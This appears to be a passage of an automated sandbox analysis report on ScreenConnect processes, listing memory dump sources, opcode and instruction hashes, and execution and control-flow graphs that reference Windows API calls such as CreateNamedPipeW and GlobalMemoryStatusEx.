                                                                                                                                                                                • Instruction Fuzzy Hash: 74E0EC71E10219DF8B80EFBDD80559EBBF8EF09651B1144A6D91DE7311E3309A10CBD1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ecfb2b86e22055ceeed88bd6ef635d63e3821399ff1c195dce70c0854dcbd7cd
                                                                                                                                                                                • Instruction ID: 1d7162be9b39b6bc999bd3551586e9a9ff071ea023ceac7daf9250e88f57a30a
                                                                                                                                                                                • Opcode Fuzzy Hash: ecfb2b86e22055ceeed88bd6ef635d63e3821399ff1c195dce70c0854dcbd7cd
                                                                                                                                                                                • Instruction Fuzzy Hash: 85D05E343502154FC788E738E44486E73DAAF8852435140A4D40DCB364EEB0EC4247D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 68d5eb3aff66b6f03742828c0f20cb0daf867c753a44fceedc4e1ba29971f4ac
                                                                                                                                                                                • Instruction ID: 32b7bfc78893912065bd131c75b3d23583a6fb31fd73ec98e97e728fac6a2911
                                                                                                                                                                                • Opcode Fuzzy Hash: 68d5eb3aff66b6f03742828c0f20cb0daf867c753a44fceedc4e1ba29971f4ac
                                                                                                                                                                                • Instruction Fuzzy Hash: 23D0C7341075409FC719CBB5DC97D547FB5FF4A60230941DAE106CB773DA25A865CB01
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1f18cb07840fdc0b759e62a4185b00b83cacfd3323946cf1e71010a85cd87258
                                                                                                                                                                                • Instruction ID: 453850cd45687ee14889c59debffd85af3f47ac2566bee654676e0d007a0b9d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f18cb07840fdc0b759e62a4185b00b83cacfd3323946cf1e71010a85cd87258
                                                                                                                                                                                • Instruction Fuzzy Hash: F2E012342445409FC705CB78D996C243BB5AF8A60471585D5D50D8F3B3D631AC65DB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: af159acaf021f5650fb50b8922e3a933ba12a357620a8c47aed9eac6a1937daf
                                                                                                                                                                                • Instruction ID: 257e0dc77b20346e1b2d0bd57d2a62ca404351e0faa84f2a01902757ab2b7f08
                                                                                                                                                                                • Opcode Fuzzy Hash: af159acaf021f5650fb50b8922e3a933ba12a357620a8c47aed9eac6a1937daf
                                                                                                                                                                                • Instruction Fuzzy Hash: B0D0127090514CEF8B04DFB4E94195EBBF9DB49200B1045AAD908D7204EB316F049B40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f4580ad2fac52f055049cdd2e840185a8a3b469f772dcc944fbf589e792dc401
                                                                                                                                                                                • Instruction ID: 94c637cfa30fa2f9b77c2d787459792985286cd571ee5297f6a2351d436ec408
                                                                                                                                                                                • Opcode Fuzzy Hash: f4580ad2fac52f055049cdd2e840185a8a3b469f772dcc944fbf589e792dc401
                                                                                                                                                                                • Instruction Fuzzy Hash: 48E0173190A3809FCF07CB6CECA6A683BB0BE4624034A01C2C040CB2A6D3216815CBB2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e2be92cb1ecae40e7169323d4816aec9b30dfe568e6e5d57e6afa2706ff5988c
                                                                                                                                                                                • Instruction ID: aa8023faff7c1084cfd20b7b9aae7a06eb5cb4d238ded3ea429ecc5aa374b20d
                                                                                                                                                                                • Opcode Fuzzy Hash: e2be92cb1ecae40e7169323d4816aec9b30dfe568e6e5d57e6afa2706ff5988c
                                                                                                                                                                                • Instruction Fuzzy Hash: 50D01730A0120CEF8B04EFA8EA4195DBBF9EF44200B1045AAD908D7254EA316F049B80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bbc8aaef112cacb5aca6ac08b0ed6227a2bc0cdd697003ed738ec224f1968460
                                                                                                                                                                                • Instruction ID: 5c6bb7f3e51d3cdba98b96865d1513cf3c62838953cefec54ee94fc949757b97
                                                                                                                                                                                • Opcode Fuzzy Hash: bbc8aaef112cacb5aca6ac08b0ed6227a2bc0cdd697003ed738ec224f1968460
                                                                                                                                                                                • Instruction Fuzzy Hash: 42D05E30A5020CEFCB04EFB8EA4296DBBF9EF44211B1045E9D408D7205EB316F149B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:12.2%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:37.5%
                                                                                                                                                                                Total number of Nodes:8
                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                execution_graph 14059 7ff848f23642 14060 7ff848f45870 CreateNamedPipeW 14059->14060 14062 7ff848f459a3 14060->14062 14054 7ff848f28014 14055 7ff848f2801d 14054->14055 14056 7ff848f28082 14055->14056 14057 7ff848f280f6 SetProcessMitigationPolicy 14055->14057 14058 7ff848f28152 14057->14058
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @c"I$h4"I$h4"I$h4"I$pW#I
                                                                                                                                                                                • API String ID: 0-789826408
                                                                                                                                                                                • Opcode ID: b3b228be2d6d0868150ff182f25e2355175172ae6e540827ae137fc62a3ab91e
                                                                                                                                                                                • Instruction ID: baf7f7809706c8d32b7495eb3839a23338be82081a48b45e0b7cb48b92e31baf
                                                                                                                                                                                • Opcode Fuzzy Hash: b3b228be2d6d0868150ff182f25e2355175172ae6e540827ae137fc62a3ab91e
                                                                                                                                                                                • Instruction Fuzzy Hash: 63C2F131A1DAAA4FF7B8BF3894566B977E1FF98380F54007AC05DC72D6DE28A9058341
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: h4"I
                                                                                                                                                                                • API String ID: 0-1409741480
                                                                                                                                                                                • Opcode ID: ba74dee2a17611cf4ccda6f130854052e2c06b3ed502b8762b045413dd23ae1c
                                                                                                                                                                                • Instruction ID: 597310a137e78d12d1b355b40d7b83a4d1eaa883aa7d3ba6286ec26acdf9b070
                                                                                                                                                                                • Opcode Fuzzy Hash: ba74dee2a17611cf4ccda6f130854052e2c06b3ed502b8762b045413dd23ae1c
                                                                                                                                                                                • Instruction Fuzzy Hash: 12120631E1DAAB4FF7B9BF3854566B923D2EF54780F54047AC42DC72C6DE29A9068380

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1131 7ff848f23642-7ff848f458da 1134 7ff848f458dc-7ff848f458e1 1131->1134 1135 7ff848f458e4-7ff848f459a1 CreateNamedPipeW 1131->1135 1134->1135 1137 7ff848f459a9-7ff848f459dc 1135->1137 1138 7ff848f459a3 1135->1138 1138->1137
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3901983103.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff848f20000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateNamedPipe
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2489174969-0
                                                                                                                                                                                • Opcode ID: dc4620f1f35475333680a5383e66c42026684b73122533a0933f94b001c05714
                                                                                                                                                                                • Instruction ID: 349dd74a3e54c379504de63df2c2905a319c43772f3209315ef109141980ccc9
                                                                                                                                                                                • Opcode Fuzzy Hash: dc4620f1f35475333680a5383e66c42026684b73122533a0933f94b001c05714
                                                                                                                                                                                • Instruction Fuzzy Hash: 3251917191CA1C8FDB58EF5C9845BE9B7E0FB59710F1442AEE04DD3251CB34A8858BC6

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @c"I$@e"I$PH$XH$`H
                                                                                                                                                                                • API String ID: 0-2353344705
                                                                                                                                                                                • Opcode ID: 57fb267c236ccb715d923af272aebc71cabe3552f35ae2cbdec8453ab7f2a994
                                                                                                                                                                                • Instruction ID: 7b02370a9696d4e37f9deb740a162018fe7a41ee18b499d37e5ecab455e2c3e0
                                                                                                                                                                                • Opcode Fuzzy Hash: 57fb267c236ccb715d923af272aebc71cabe3552f35ae2cbdec8453ab7f2a994
                                                                                                                                                                                • Instruction Fuzzy Hash: 7561D872A0D9C98FEBA8EF389455AA537D1FF64750F0405BDC45EC7186DD29EC068780

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: h4"I$0"I$2"I
                                                                                                                                                                                • API String ID: 0-3795713424
                                                                                                                                                                                • Opcode ID: 83d938e31918bb5f7d0a6a8059c46c6dd43ac66965246757cc392b1384d28f5b
                                                                                                                                                                                • Instruction ID: a6ce7439ac9f6d550b328adb5365133957fd57f1ce1b4beb17c5c090f2f751cf
                                                                                                                                                                                • Opcode Fuzzy Hash: 83d938e31918bb5f7d0a6a8059c46c6dd43ac66965246757cc392b1384d28f5b
                                                                                                                                                                                • Instruction Fuzzy Hash: D0122571A5DAAA4FF7B8FA3C94556B537D1FF69380F0400BAD05DC7283DD29A8068360

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0"I$2"I
                                                                                                                                                                                • API String ID: 0-3370933124
                                                                                                                                                                                • Opcode ID: 9c6a3dcb0e5c1622971a336efab0cf3374fc2f1779ebeda08db2fc7a22488e2d
                                                                                                                                                                                • Instruction ID: 4e194757fef68410a944ef41768e674e6f9645d9016f69ba7684a1b3360a6791
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c6a3dcb0e5c1622971a336efab0cf3374fc2f1779ebeda08db2fc7a22488e2d
                                                                                                                                                                                • Instruction Fuzzy Hash: 2FC1373290DD9B5FFBB9FE3894418B537E0EF55790B4401BAC45E87586EE29F90A8380

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3901983103.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff848f20000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                                                                • Opcode ID: cf7084ebb5400a1690591197feb286a57d023385f84e6c0041e4ec65c6dce8bb
                                                                                                                                                                                • Instruction ID: de95a8c127836d39a385ecd735ee2ee07607308d559a99d7d234a538a30b7664
                                                                                                                                                                                • Opcode Fuzzy Hash: cf7084ebb5400a1690591197feb286a57d023385f84e6c0041e4ec65c6dce8bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 98512531C1CB598FEB18EFA8984A5E97BF0EF55360F04017EE049C3192DF68A846CB95
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: h4"I
                                                                                                                                                                                • API String ID: 0-1409741480
                                                                                                                                                                                • Opcode ID: 8afca70faedaec9600297e78286e6040aaefccd8c5e591e2949ae5cf0866781a
                                                                                                                                                                                • Instruction ID: 16aed2e8ef5a85a1df8511c2a3e9de5829570a15a733b2672d5bae7c1b620c8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 8afca70faedaec9600297e78286e6040aaefccd8c5e591e2949ae5cf0866781a
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B811431E1DAA74EFBB9BE3854566B567D0FF54B80F4400BAC86DC72C7DE2CA9058281

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: P"I
                                                                                                                                                                                • API String ID: 0-938309057
                                                                                                                                                                                • Opcode ID: 677989349884b47904237985626a8017970057f6ac23d5ef4d593f68466d969d
                                                                                                                                                                                • Instruction ID: e6729daf1465b029711fd911c5477f400e5bcd4e4535a605cb39d6dae81ac339
                                                                                                                                                                                • Opcode Fuzzy Hash: 677989349884b47904237985626a8017970057f6ac23d5ef4d593f68466d969d
                                                                                                                                                                                • Instruction Fuzzy Hash: F2511331D1EADA4FF7B9AB3858555B53BE0FF65740B1800BBC05DCB187EE19A8458381
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4fb91a9e04cdea57649570ee111210bd80013b5a26d87c4ab7c7a900ddd93543
                                                                                                                                                                                • Instruction ID: 1e34c4a4d6dc9fb1670c2ce331599e4f6b21d653dec86293ed91a6168c2d2582
                                                                                                                                                                                • Opcode Fuzzy Hash: 4fb91a9e04cdea57649570ee111210bd80013b5a26d87c4ab7c7a900ddd93543
                                                                                                                                                                                • Instruction Fuzzy Hash: B2B1B53560DA964FE7ECEF28D0906E177A1FF55354B2405BAC06DCF187CA29E846C780
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 121da0426b24a41757b64e4f4701d1e6b7c26909c2137e013ab3df772cd129eb
                                                                                                                                                                                • Instruction ID: 56285fe381e1064242d6ba5456234a81f2996b7852932ba2a8202fcde4310dc4
                                                                                                                                                                                • Opcode Fuzzy Hash: 121da0426b24a41757b64e4f4701d1e6b7c26909c2137e013ab3df772cd129eb
                                                                                                                                                                                • Instruction Fuzzy Hash: DD719231E1C96B4EF7B9FF3494566B962D6FF98384F50043AC02EC32C1DE29B9068644
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a35776e3b9ace2d8d53684eb5f25247e4ec677a752a4d43a4ed30438010eeec7
                                                                                                                                                                                • Instruction ID: 53fdde18e70ddfba54f127b7c9da61e1ee39849ac0463df3faaaec268a8f7330
                                                                                                                                                                                • Opcode Fuzzy Hash: a35776e3b9ace2d8d53684eb5f25247e4ec677a752a4d43a4ed30438010eeec7
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D512532D0D9DA8FFB75FB38A8550B97BE1EF94380F04017AD15C8B692DF29A8468341
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d8889fe8320feb9916d751458f85908450fb38e895bfe770417b09db43750b9f
                                                                                                                                                                                • Instruction ID: 7e282a101066a8f17db1f467f72f7163ff7cec57272813d9242cc45895ef00d8
                                                                                                                                                                                • Opcode Fuzzy Hash: d8889fe8320feb9916d751458f85908450fb38e895bfe770417b09db43750b9f
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F213A3190DBD94FE7B5AB3598140A67BF1FF85360B0801BBD09DCB592DB2CA846C751
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 22bc8ba669cbd238bc198d740bd7770de527132fd23bd0311038c49d31d9f600
                                                                                                                                                                                • Instruction ID: 72d9a0da1ddcd35a811a08729a61d413ee1bcb904d1d78549fbeee64800d7a5f
                                                                                                                                                                                • Opcode Fuzzy Hash: 22bc8ba669cbd238bc198d740bd7770de527132fd23bd0311038c49d31d9f600
                                                                                                                                                                                • Instruction Fuzzy Hash: 63E06D7190E7D54FD756DB3484A88E57F60AE1322131900EFD4858F0A3E5158989C752
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 696aa68bcc353994caa201eb86fdf266b1603f8696b018aa9cc77afef9418886
                                                                                                                                                                                • Instruction ID: 42b2f3bc9b03f450e78ddc9a0df64d389de9527d76476b6582f6eb61d0694f78
                                                                                                                                                                                • Opcode Fuzzy Hash: 696aa68bcc353994caa201eb86fdf266b1603f8696b018aa9cc77afef9418886
                                                                                                                                                                                • Instruction Fuzzy Hash: FDE0C22995DE630AFB7C3AB6B9913B660C1DF053D1F0980BB942DC00C5DD9CDCC08955
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a7006b556e69f2d1da25beb5652c5a284bf9652784f78e0c2e325764d48b961a
                                                                                                                                                                                • Instruction ID: 86742f31c3ab10a5f7e5f205a2a1abbde34395978377f5f4cc70d3d486e544d6
                                                                                                                                                                                • Opcode Fuzzy Hash: a7006b556e69f2d1da25beb5652c5a284bf9652784f78e0c2e325764d48b961a
                                                                                                                                                                                • Instruction Fuzzy Hash: B6C04812B5A86D0A95E4B25C38452A986C2E788AA1B8905B2E80CC728AE9084CC213C2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e02d41f2b01c4d47cf7d8c871b91f2ba83b98751474a060e31547c279c3e682
                                                                                                                                                                                • Instruction ID: d2a9e2b245e8e990972714b30d08e0d846b2f03329c6548106302e3a0631e641
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e02d41f2b01c4d47cf7d8c871b91f2ba83b98751474a060e31547c279c3e682
                                                                                                                                                                                • Instruction Fuzzy Hash: FCC09B20E1C5564EF154FF34544117D11526FCC240F504435D01D851C7CF3DB5015649
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                • Instruction ID: 50030d17c2ff5e126855075caa863da81f311e2beeb8978d77648c2946bbb42a
                                                                                                                                                                                • Opcode Fuzzy Hash: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                • Instruction Fuzzy Hash: 46A00210E4D9664DF0717A24110117D04410F94690F204176D11E852C6DE1DAE42129A

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:13.1%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:10
                                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                                execution_graph 15473 7ff849258d94 15476 7ff849258d9d 15473->15476 15474 7ff849258f39 GlobalMemoryStatusEx 15475 7ff849258f65 15474->15475 15476->15474 15477 7ff849258e98 15476->15477 15468 7ff848f48014 15470 7ff848f4801d 15468->15470 15469 7ff848f48082 15470->15469 15471 7ff848f480f6 SetProcessMitigationPolicy 15470->15471 15472 7ff848f48152 15471->15472

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.2535827354.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1890195054-0
                                                                                                                                                                                • Opcode ID: 15a42ca25e68da1dc8bf9c705f66a898102fb44f9be28cd937afad73df14401d
                                                                                                                                                                                • Instruction ID: 7fd8e953e0e7ae36ab8bec1e7c54e2a0115dfeebb084d411eb840e0d6a5f20eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 15a42ca25e68da1dc8bf9c705f66a898102fb44f9be28cd937afad73df14401d
                                                                                                                                                                                • Instruction Fuzzy Hash: AF812431C0D6D98FF775EB6858056B9BFE0EF56360F0881BAE05CC7593DAA8680A8741

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
